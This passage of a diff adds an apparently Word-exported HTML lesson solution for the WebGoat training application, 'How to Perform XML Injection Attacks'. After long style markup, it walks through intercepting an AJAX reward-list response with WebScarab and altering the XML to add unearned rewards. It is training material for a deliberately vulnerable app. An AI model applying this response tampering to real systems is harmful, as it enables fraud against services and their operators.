+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform XML Injection Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches how to perform XML Injection attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <span
+style='mso-tab-count:1'>   </span><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>AJAX applications
+use XML to exchange information with the server. This XML can be easily
+intercepted and altered by a malicious attacker. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->WebGoat-Miles
+Reward Miles shows all the rewards available. Once you've entered your account
+ID, the lesson will show you your balance and the products you can afford. Your
+goal is to try to add more rewards to your allowed set of rewards. Your account
+ID is 836239.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_61" o:spid="_x0000_i1032" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XMLInjection_files/image017.jpg" v:shapes="Picture_x0020_61"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> AJAX Security - XML Injection</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To understand
+the behavior of the AJAX application, enter your account number 836239 and
+intercept the HTTP Request and HTTP Response using WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_62" o:spid="_x0000_i1031"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XMLInjection_files/image018.jpg" v:shapes="Picture_x0020_62"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Enter account number</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_63" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/XMLInjection_files/image019.jpg" v:shapes="Picture_x0020_63"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercepted HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_64" o:spid="_x0000_i1029"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/XMLInjection_files/image020.jpg" v:shapes="Picture_x0020_64"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Intercepted HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>From the HTTP Response you can see that you get back an XML
+message with the rewards for your account:</p></span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</p></span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>What happens if you intercept this HTTP Response and update
+the XML message to become:</p></span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Core Duo Laptop 2000
+Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Hawaii Cruise 3000 Pts&lt;/reward&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</p></span>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></p>
+</span>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_68" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/XMLInjection_files/image021.jpg" v:shapes="Picture_x0020_68"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Changed XML response</p>
+
